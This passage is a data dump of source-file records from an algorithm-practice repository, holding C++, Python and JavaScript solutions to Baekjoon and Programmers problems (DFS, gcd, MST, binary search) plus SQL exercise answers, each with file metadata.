if(new_exp[j] == \"-\")\n num = stoll(new_exp[j-1]) - stoll(new_exp[j+1]);\n else if(new_exp[j] == \"*\")\n num = stoll(new_exp[j-1]) * stoll(new_exp[j+1]);\n \n new_exp.insert(new_exp.begin() + (j+2), to_string(num));\n new_exp.erase(new_exp.begin() + (j-1), new_exp.begin() + (j + 2));\n \n j = -1;\n }\n }\n }\n \n num = stoll(new_exp[0]);\n pq.push(abs(num));\n \n new_exp = cp;\n \n return;\n }\n \n for(int i = 1 ; i <= n ; i++){\n if(!check[i]){\n check[i] = true;\n pArr[depth] = i;\n permutation(depth + 1);\n check[i] = false;\n }\n }\n}\n\nlong long solution(string expression) {\n long long answer = 0;\n int plus=0, minus=0, mul=0;\n string tmp;\n \n for(int i = 0 ; i < expression.length() ; i++){\n if(expression[i] != '*' && expression[i] != '+' && expression[i] != '-'){\n tmp += expression[i];\n if(i == expression.length() - 1)\n new_exp.push_back(tmp);\n }\n else{\n new_exp.push_back(tmp);\n tmp = expression[i];\n new_exp.push_back(tmp);\n tmp = \"\";\n }\n \n if(expression[i] == '+' && plus == 0){\n op.push_back(\"+\"); plus++;\n }\n else if(expression[i] == '-' && minus == 0){\n op.push_back(\"-\"); minus++;\n }\n else if(expression[i] == '*' && mul == 0){\n op.push_back(\"*\"); mul++;\n }\n }\n \n cp = new_exp;\n n = op.size(); //식에 존재하는 연산자 종류의 개수\n \n permutation(0);\n answer = pq.top();\n \n return answer;\n}\n\nint main(){\n long long ans;\n ans = solution(\"100-200*300-500+20\");\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.444726824760437, "alphanum_fraction": 0.4803049564361572, "avg_line_length": 20.29729652404785, "blob_id": "b3bea8df186a64dcc479d44f4ef34a3f95aa6c41", "content_id": "021fcbff812c007121f1a8353b539532212d90dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 821, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Implementation/15927.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/* \nBOJ 15927번: 회문은 회문아니야!!\n2021-12-21\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str, front, back;\n bool flag = true;\n cin >> str;\n\n int length = str.length();\n \n front = str.substr(0, length / 2);\n\n if(length % 2 == 0) back = str.substr(length / 2);\n else back = str.substr(length / 2 + 1);\n\n reverse(back.begin(), back.end());\n\n if(front == back) { // 팰린드롬 O\n for(int i = 1 ; i < length ; i++) {\n if(str[i - 1] != str[i]) {\n cout << length - 1;\n flag = false;\n break;\n }\n }\n if(flag) cout << -1;\n }\n else cout << str.length(); // 팰린드롬 X\n \n return 0;\n}" }, { "alpha_fraction": 0.4695945978164673, "alphanum_fraction": 0.5304054021835327, "avg_line_length": 15.5, "blob_id": "c1ea345fe0f447c0f5aad2dec7888096c1b68134", "content_id": "559651b232ca9adbb9866c096f0378eba62f86da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 41, "num_lines": 18, "path": "/BOJ/Mathematics/1735_1.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1735_1.py (gcd 함수 구현)\n# BOJ 1735: 분수 합\n# DATE: 2022-03-16\nimport sys\nread = sys.stdin.readline\n\ndef gcd(n, m):\n return n if m == 0 else gcd(m, n % m)\n \na, b = map(int, read().split())\nc, d = map(int, read().split())\n\nn = a * d + b * c\nm = b * d\n\ndiv = gcd(n, m)\n\nprint(n // div, m // div)" }, { "alpha_fraction": 0.42236024141311646, "alphanum_fraction": 0.47204968333244324, "avg_line_length": 19.1875, "blob_id": "c5bced023e2fbaa5132da1f3084d46a0a0a3e8ca", "content_id": "24b94f0f0a818bf23773d43a1a5b8769d3f43af5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 336, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/programmers/Level 2/remove_pair.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 2: 짝지어 제거하기\n# date: 2022-06-10\ndef solution(s):\n answer = -1\n list = []\n \n for i in s:\n if len(list) == 0 or list[-1] != i:\n list.append(i)\n elif list[-1] == i:\n list.pop()\n \n if len(list) > 0: answer = 0\n else: answer = 1\n \n return answer" }, { "alpha_fraction": 0.3726937174797058, "alphanum_fraction": 0.4132841229438782, "avg_line_length": 16.516128540039062, "blob_id": "c2ee8a13a114623a38f920d0c3f5be4afdf6d43f", "content_id": "e69f7bf96303a4d60131fdeee70d058299aebff7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 556, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/BOJ/Greedy/2828.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2828번: 사과 담기 게임\n2021-03-26\n*/\n#include <iostream>\n#include <cstdlib>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, a, dst=0, now = 1;\n cin >> n >> m >> a;\n\n for(int i = 0 ; i < a ; i++){\n int num;\n cin >> num;\n\n if(num > (now + m -1)){\n dst += num - (now + m -1);\n now = num - m + 1;\n }\n else if(num < now){\n dst += now - num;\n now = num;\n }\n }\n\n cout << dst;\n\n return 0;\n}" }, { "alpha_fraction": 0.5082417726516724, "alphanum_fraction": 0.557692289352417, "avg_line_length": 16.380952835083008, "blob_id": "cbf45ed529399f6ea56ca74d6a7179e6950a8c37", "content_id": "669870feb755e3666b19f26fdc8dd3ff912e1fd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 376, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/BOJ/Mathematics/1850.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1850번: 최대공약수\nDATE: 2022-01-24\nEuclidean algorithm\n*/\n#include <iostream>\nusing namespace std;\n\nlong long gcd(long long a, long long b) {\n return b ? gcd(b, a % b) : a;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long a, b;\n cin >> a >> b;\n \n for(int i = 0 ; i < gcd(a, b) ; i++) cout << 1;\n\n return 0;\n}" }, { "alpha_fraction": 0.44692736864089966, "alphanum_fraction": 0.48603352904319763, "avg_line_length": 16.071428298950195, "blob_id": "97c27f87b866ed3b5e3fa049c02b09618f00df95", "content_id": "01dab643e753a95108f21522df178a0c5d0ea95f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 732, "license_type": "no_license", "max_line_length": 58, "num_lines": 42, "path": "/BOJ/BFS_DFS/11725.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11725번: 트리의 부모 찾기\nDATE: 2022-02-02\nDFS\n*/\n#include <iostream>\n#include <vector>\n#define MAX 100001\nusing namespace std;\n\nvector<int> graph[MAX];\nint n;\nint arr[MAX];\n\nvoid dfs(int node) {\n for(int i = 0 ; i < graph[node].size() ; i++) {\n int nextNode = graph[node][i];\n\n if(!arr[nextNode]) {\n arr[nextNode] = node;\n dfs(nextNode);\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b;\n cin >> n;\n\n for(int i = 0 ; i < n - 1 ; i++) {\n cin >> a >> b; \n graph[a].push_back(b);\n graph[b].push_back(a);\n }\n\n dfs(1);\n\n for(int i = 2 ; i <= n ; i++) cout << arr[i] << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.5020464062690735, "alphanum_fraction": 0.5279672741889954, "avg_line_length": 15.681818008422852, "blob_id": "9d0d12136cb9fb23aad5c185c1b6b9a41b72d38d", "content_id": "4e2242cb0bbfdd6ac48468332c7385b2890f1a95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 747, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Mathematics/1747.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1747번: 소수&팰린드롬\n2021-12-26\n*/\n#include <iostream>\n#include <math.h>\n#include <algorithm>\nusing namespace std;\n\nbool isPrime(int num) {\n if (num < 2) return false;\n\n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n\n return true;\n}\n\nbool checkPalindrome(string str) {\n string front, back;\n\n front = str;\n reverse(str.begin(), str.end());\n back = str;\n\n if(front == back) return true;\n else return false;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = n ; ; i++) {\n if(isPrime(i) && checkPalindrome(to_string(i))){\n cout << i;\n break;\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.6327160596847534, "alphanum_fraction": 0.6800411343574524, "avg_line_length": 20.600000381469727, "blob_id": "ecf8f77b94fe6f40e0db2f72c91e1eb86edff2f9", "content_id": "3ce3dbc6d954315120a09119037e811a73b29482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1038, "license_type": "no_license", "max_line_length": 109, "num_lines": 45, "path": "/programmers/SQL/GROUP BY.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# GROUP BY\n\n**[1. 고양이와 개는 몇 마리 있을까 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59040)**\n\n```sql\nSELECT ANIMAL_TYPE, COUNT(ANIMAL_TYPE) as COUNT\nFROM ANIMAL_INS\nGROUP BY ANIMAL_TYPE\nORDER BY ANIMAL_TYPE\n```\n\n<br/>\n\n**[2. 동명 동물 수 찾기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59041)**\n\n```sql\nSELECT NAME, COUNT(NAME) as COUNT\nFROM ANIMAL_INS\nGROUP BY NAME\nHAVING COUNT(NAME) >= 2\nORDER BY NAME\n```\n\n<br/>\n\n**[3. 입양 시각 구하기(1) (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59412)**\n\n```sql\nSELECT HOUR(DATETIME) as HOUR, COUNT(HOUR(DATETIME)) as COUNT\nFROM ANIMAL_OUTS\nGROUP BY HOUR(DATETIME)\nHAVING HOUR > 8 and HOUR < 20\nORDER BY HOUR(DATETIME)\n```\n\n<br/>\n\n**[4. 입양 시각 구하기(2) (Level 4)](https://programmers.co.kr/learn/courses/30/lessons/59413)**\n\n```sql\nSET @HOUR := -1;\nSELECT (@HOUR := @HOUR + 1) AS HOUR, (SELECT COUNT(*) FROM ANIMAL_OUTS WHERE HOUR(DATETIME) = @HOUR) AS COUNT\nFROM ANIMAL_OUTS\nWHERE @HOUR < 23\n```\n" }, { "alpha_fraction": 0.36328125, "alphanum_fraction": 0.40234375, "avg_line_length": 17.981481552124023, "blob_id": "5a147d7d4679caaa5789d9d3157e64d072eaf219", "content_id": "31beab9809d508f20b66c469b5f631ae7408266a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 58, "num_lines": 54, "path": "/BOJ/BFS_DFS/1926.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1926번: 그림\nDATE: 2022-02-03\nDFS\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 501\nusing namespace std;\n\nint n, m, maxVal = 0, cnt = 0;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid dfs(int x, int y) {\n visited[x][y] = true;\n cnt++;\n\n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(arr[nx][ny] && !visited[nx][ny]) dfs(nx, ny);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int num = 0;\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n if(arr[i][j] == 1 && !visited[i][j]) {\n dfs(i, j);\n num++;\n maxVal = max(maxVal, cnt);\n cnt = 0;\n }\n }\n }\n\n cout << num << '\\n' << maxVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.4854961931705475, "alphanum_fraction": 0.5297709703445435, "avg_line_length": 13.909090995788574, "blob_id": "6e7e683b5241ff9c6293888fe36958940937a3e6", "content_id": "29ba31e98a8496e3325baa1bed15c01e96f90286", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 715, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/BOJ/Greedy/15903.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 15903번: 카드 합체 놀이\nDATE: 2021-01-10\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tint n, m, a;\n\tlong long num1, num2, sum = 0;\n\tpriority_queue<long long, vector <long long>, greater <long long>>pq;\n\t\n\tcin >> n >> m;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> a;\n\t\tpq.push(a);\n\t}\n\t\n\tfor (int j = 0; j < m; j++) {\n\t\t//가장 작은 두 값\n\t\tnum1 = pq.top();\n\t\tpq.pop();\n\t\tnum2 = pq.top();\n\t\tpq.pop();\n\n\t\t//더한 값으로 덮어쓰기\n\t\tpq.push(num1 + num2);\n\t\tpq.push(num1 + num2);\n\t}\n\n\t//모든 카드 값 더하기\n\tfor (int k = 0; k < n; k++) {\n\t\tsum += pq.top();\n\t\tpq.pop();\n\t}\n\n\tcout << sum;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.4328097701072693, "alphanum_fraction": 0.47294938564300537, "avg_line_length": 14.94444465637207, "blob_id": "14864c3f2e1299eb2a1688cb43232729b098a4da", "content_id": "3c1b51fa0649192d42d5c4d5f87142d9891b287f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 577, "license_type": "no_license", "max_line_length": 59, "num_lines": 36, "path": "/BOJ/BFS_DFS/15652.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15652번: N과 M (4)\n2022-01-06\nBacktracking\n*/\n#include <iostream>\n#define MAX 9\nusing namespace std;\n\nint n, m;\nint arr[MAX];\nbool visited[MAX];\n\nvoid dfs(int num, int cnt){\n if(cnt == m) {\n for(int i = 0 ; i < m ; i++) cout << arr[i] << \" \";\n cout << '\\n';\n return;\n }\n\n for(int i = num ; i <= n ; i++){\n arr[cnt] = i;\n visited[i] = true;\n dfs(i, cnt + 1);\n visited[i] = false;\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n dfs(1, 0);\n\n return 0;\n}" }, { "alpha_fraction": 0.47894737124443054, "alphanum_fraction": 0.5105262994766235, "avg_line_length": 16.31818199157715, "blob_id": "fd47cb694e93e865f1a5e0806847657a5dfa5ac8", "content_id": "c1055e49b17d10f838b1e80bb3346f4a22602686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 384, "license_type": "no_license", "max_line_length": 41, "num_lines": 22, "path": "/programmers/Level 1/budget.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 예산\ndate: 2022-03-30\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint solution(vector<int> d, int budget) {\n int answer = 0, sum = 0;\n \n sort(d.begin(), d.end());\n \n for(int i = 0 ; i < d.size() ; i++) {\n if((sum += d[i]) <= budget) {\n answer++;\n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.43449297547340393, "alphanum_fraction": 0.4581791162490845, "avg_line_length": 19.484848022460938, "blob_id": "66227b6c6e3e502252790d4a8c7ed119efc7ade7", "content_id": "e091179d31774144d650a9a82bf8b756d27d0ec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 59, "num_lines": 66, "path": "/BOJ/Brute Force/1339.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1339번: 단어 수학\nDATE: 2021-07-18\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nchar alpha[256];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<string> word;\n vector<char> ch;\n string str;\n int n, maximum=-1;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> str;\n word.push_back(str);\n }\n\n for(int i = 0 ; i < word.size() ; i++){\n cin >> word[i];\n for(int j = 0 ; j < word[i].length() ; j++){\n ch.push_back(word[i][j]);\n }\n }\n\n sort(ch.begin(), ch.end());\n ch.erase(unique(ch.begin(), ch.end()), ch.end());\n\n vector<int> number;\n //vector<int> number(ch.size()); => 시간 초과\n\n for(int i = 0 ; i < ch.size() ; i++){\n number.push_back(9 - i);\n }\n\n sort(number.begin(), number.end());\n\n do{\n int sum=0;\n\n for(int i = 0 ; i < ch.size() ; i++){\n alpha[ch[i]] = number[i];\n }\n\n for(int i = 0 ; i < word.size() ; i++){\n int res = 0;\n for(int j = 0 ; j < word[i].length() ; j++){\n res = res * 10 + alpha[word[i][j]];\n }\n sum += res;\n }\n\n maximum = max(maximum, sum);\n\n }while(next_permutation(number.begin(), number.end()));\n\n cout << maximum;\n\n return 0; \n}" }, { "alpha_fraction": 0.4552631676197052, "alphanum_fraction": 0.4894736707210541, "avg_line_length": 15.565217018127441, "blob_id": "1ecf06b4bfe41228be55d52517f683987ee605a1", "content_id": "dccdf5e2d0ce2c94145c7a34036cb38b4e6cd038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 406, "license_type": "no_license", "max_line_length": 34, "num_lines": 23, "path": "/programmers/Level 1/middle_letter.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 가운데 글자 가져오기\n//2021-10-08\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nstring solution(string s) {\n string answer = \"\";\n int idx = s.length() / 2;\n \n if(s.length() % 2 == 0) {\n //짝수\n answer += s[idx - 1];\n answer += s[idx];\n }\n else {\n //홀수\n answer += s[idx];\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.34927114844322205, "alphanum_fraction": 0.3749271035194397, "avg_line_length": 27.131147384643555, "blob_id": "180ffdcd01de3c236d5a5daddc37c075456786ce", "content_id": "316088d903bbe72b15a9e7c6d61a6721a00a7aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1715, "license_type": "no_license", "max_line_length": 79, "num_lines": 61, "path": "/programmers/Level 1/push_keypad.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1 : Push keypad\n//2020 KAKAO Internship\n//2021-04-28\n#include <string>\n#include <vector>\n#include <cmath>\n\nusing namespace std;\n\nstring solution(vector<int> numbers, string hand) {\n string answer = \"\";\n int left_x=3, left_y=0, right_x=3, right_y=2;\n \n for(int i = 0 ; i < numbers.size() ; i++){\n if(numbers[i] == 1 || numbers[i] == 4 || numbers[i] == 7){ //1 4 7\n answer += 'L';\n left_x = numbers[i] / 3;\n left_y = 0;\n }\n else if(numbers[i] == 3 || numbers[i] == 6 || numbers[i] == 9){ //3 6 9\n answer += 'R';\n right_x = numbers[i] / 3 - 1;\n right_y = 2;\n }\n else{ //2 5 8 0\n if(numbers[i] == 0)\n numbers[i] = 11;\n \n int tmp_x = numbers[i] / 3;\n int tmp_y = 1;\n int dstLeft = abs(tmp_x-left_x) + abs(tmp_y - left_y);\n int dstRight = abs(tmp_x-right_x) + abs(tmp_y-right_y);\n \n if(dstLeft < dstRight) {\n answer += 'L';\n left_x = tmp_x;\n left_y = tmp_y;\n }\n else if(dstLeft > dstRight){\n answer += 'R';\n right_x = tmp_x;\n right_y = tmp_y;\n }\n else{\n if(hand == \"left\"){\n answer += 'L';\n left_x = tmp_x;\n left_y = tmp_y;\n }\n else if(hand == \"right\"){\n answer += 'R';\n right_x = tmp_x;\n right_y = tmp_y;\n }\n }\n \n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.5526315569877625, "alphanum_fraction": 0.5986841917037964, "avg_line_length": 24.41666603088379, "blob_id": "7977d5d1d360c9a129ab409b802c5732b68e1eca", "content_id": "4d5e0826ad0632bedb86f38952799f543b57d2cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 346, "license_type": "no_license", "max_line_length": 117, "num_lines": 12, "path": "/programmers/Level 1/number_strings_and_english_words.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 숫자 문자열과 영단어\n2021 카카오 채용연계형 인턴십\n2021-12-21\n*/\nfunction solution(s) {\n const arr = [/zero/gi, /one/gi, /two/gi, /three/gi, /four/gi, /five/gi, /six/gi, /seven/gi, /eight/gi, /nine/gi];\n\n for (let i = 0; i < arr.length; i++) s = s.replace(arr[i], i)\n\n return parseInt(s);\n}" }, { "alpha_fraction": 0.38256657123565674, "alphanum_fraction": 0.4140435755252838, "avg_line_length": 16.595745086669922, "blob_id": "38276a9816dc2ae93c03e71ca693061c07396248", "content_id": "8d64cfe8849e7887e42899bbc7b3090c7cf454e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 838, "license_type": "no_license", "max_line_length": 58, "num_lines": 47, "path": "/BOJ/Binary Search/2805.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 2805번: 나무 자르기\n//2021-05-25\n//Binary Search\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long n, m, max=-1;\n cin >> n >> m;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n sort(arr, arr+n);\n\n long long start = 0;\n long long end = arr[n - 1];\n long long mid;\n\n while(start <= end){\n long long sum = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < n ; i++){\n if(arr[i] - mid > 0)\n sum += arr[i] - mid;\n }\n\n if(sum >= m){\n start = mid + 1;\n if(mid > max)\n max = mid;\n }\n else{\n end = mid - 1;\n }\n\n }\n\n cout << max;\n \n return 0;\n}" }, { "alpha_fraction": 0.49735450744628906, "alphanum_fraction": 0.5155790448188782, "avg_line_length": 20.54430389404297, "blob_id": "485c46e6435e68d8c33d40d3e5fbaef8ee067501", "content_id": "30bdae48f9692f0bc187c7549b667479d372adff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1715, "license_type": "no_license", "max_line_length": 78, "num_lines": 79, "path": "/BOJ/MST/4386.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4386번: 별자리 만들기\n2021-12-29\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <math.h>\n#define MAX 101\nusing namespace std;\n\nvector<pair<double, double>> coordinate;\nvector<pair<double, pair<double, double>>> edge;\nint parent[MAX];\n\nint getParent(int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n double ans = 0;\n int n;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n double x, y;\n cin >> x >> y;\n coordinate.push_back({x, y});\n }\n\n for(int i = 0 ; i < coordinate.size() ; i++) {\n double x_a = coordinate[i].first;\n double y_a = coordinate[i].second;\n\n for(int j = i + 1 ; j < coordinate.size() ; j++){\n double x_b = coordinate[j].first;\n double y_b = coordinate[j].second;\n \n double distance = sqrt(pow((x_b - x_a), 2) + pow((y_b - y_a), 2));\n edge.push_back({distance, {i + 1, j + 1}});\n }\n }\n\n sort(edge.begin(), edge.end());\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n double c = edge[i].first;\n\n if(findParent(a, b)) continue;\n unionParent(a, b);\n ans += c;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.40582525730133057, "alphanum_fraction": 0.4407767057418823, "avg_line_length": 18.452829360961914, "blob_id": "02bfb8fb89328f9deb1905581b8f6e07243afe0b", "content_id": "27170bde7d2be2abf0886e7e1dd8ae66344192b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1068, "license_type": "no_license", "max_line_length": 70, "num_lines": 53, "path": "/BOJ/BFS_DFS/14889.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14889번: 스타트와 링크\nDATE: 2022-02-04\nBacktracking\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint n, minVal = 1e9;\nint arr[21][21];\nbool visited[21]; // 팀 배정\n\nvoid dfs(int cnt, int num) {\n if(cnt == n / 2) {\n int start = 0, link = 0;\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n if(visited[i] && visited[j]) start += arr[i][j];\n else if(!visited[i] && !visited[j]) link += arr[i][j];\n }\n }\n\n minVal = min(minVal, abs(start - link));\n\n return;\n }\n\n for(int i = num ; i < n ; i++) { // n을 포함하면 중복 발생\n if(visited[i]) continue;\n\n visited[i] = true;\n dfs(cnt + 1, i + 1);\n visited[i] = false;\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> arr[i][j];\n }\n }\n\n dfs(0, 1); \n cout << minVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.686956524848938, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 25.136363983154297, "blob_id": "49422fbb7f8c4d3ee12991b0c736c13acbd9c019", "content_id": "fa63b836765945cc31a701a3030b576c8aa033a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1224, "license_type": "no_license", "max_line_length": 92, "num_lines": 44, "path": "/programmers/SQL/JOIN.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# JOIN\n\n**[1. 없어진 기록 찾기 (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59042)**\n\n```sql\nSELECT OUTS.ANIMAL_ID, OUTS.NAME\nFROM ANIMAL_INS INS RIGHT JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE INS.ANIMAL_ID IS NULL\nORDER BY INS.ANIMAL_ID\n```\n\n<br/>\n\n**[2. 있었는데요 없었습니다 (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59043)**\n\n```sql\nSELECT INS.ANIMAL_ID, INS.NAME\nFROM ANIMAL_INS INS INNER JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE INS.DATETIME > OUTS.DATETIME\nORDER BY INS.DATETIME\n```\n\n<br/>\n\n**[3. 오랜 기간 보호한 동물(1) (Level 3)](https://programmers.co.kr/learn/courses/30/lessons/59044)**\n\n```sql\nSELECT INS.NAME, INS.DATETIME\nFROM ANIMAL_INS INS LEFT JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE OUTS.ANIMAL_ID IS NULL\nORDER BY INS.DATETIME\nLIMIT 3\n```\n\n<br/>\n\n**[4. 보호소에서 중성화한 동물 (Level 4)](https://programmers.co.kr/learn/courses/30/lessons/59045)**\n\n```sql\nSELECT INS.ANIMAL_ID, INS.ANIMAL_TYPE, INS.NAME\nFROM ANIMAL_INS INS INNER JOIN ANIMAL_OUTS OUTS ON INS.ANIMAL_ID = OUTS.ANIMAL_ID\nWHERE INS.SEX_UPON_INTAKE != OUTS.SEX_UPON_OUTCOME\nORDER BY INS.ANIMAL_ID\n```\n" }, { "alpha_fraction": 0.4602609872817993, "alphanum_fraction": 0.4887307286262512, "avg_line_length": 17.755556106567383, "blob_id": "b862c28deecb012ed3cfe98ecbe671b0376807f2", "content_id": "1994407b0c62a59eba2d823a3015b342750dacd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 853, "license_type": "no_license", "max_line_length": 85, "num_lines": 45, "path": "/programmers/Level 3/connecting_islands.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 3: 섬 연결하기\n# date: 2022-06-11\nparent = []\n\ndef getParent(x):\n if x == parent[x]: \n return x\n parent[x] = getParent(parent[x])\n return parent[x]\n\ndef findParent(a, b):\n a = getParent(a)\n b = getParent(b)\n \n if a == b: \n return 1\n else:\n return 0\n \ndef unionParent(a, 